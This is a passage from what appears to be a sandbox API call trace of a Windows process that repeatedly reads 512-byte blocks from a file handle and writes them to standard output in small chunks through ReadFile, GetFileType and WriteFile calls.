returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, 
lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.817] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.817] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] GetFileType (hFile=0x50) returned 0x1 [0225.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.817] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, 
lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] GetFileType (hFile=0x50) returned 0x1 [0225.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.818] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.818] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.819] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.819] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0225.819] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] 
GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.820] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.820] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | 
out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, 
lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.822] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.822] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 
[0225.822] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.823] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) 
returned 1 [0225.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.823] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] GetFileType (hFile=0x50) returned 0x1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] GetFileType (hFile=0x50) returned 0x1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] GetFileType (hFile=0x50) returned 0x1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.919] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.919] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0225.919] GetFileType (hFile=0x50) returned 0x1 [0225.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.919] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.919] GetFileType (hFile=0x50) returned 0x1 [0225.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.919] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.920] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.920] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, 
lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.921] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.921] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.922] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, 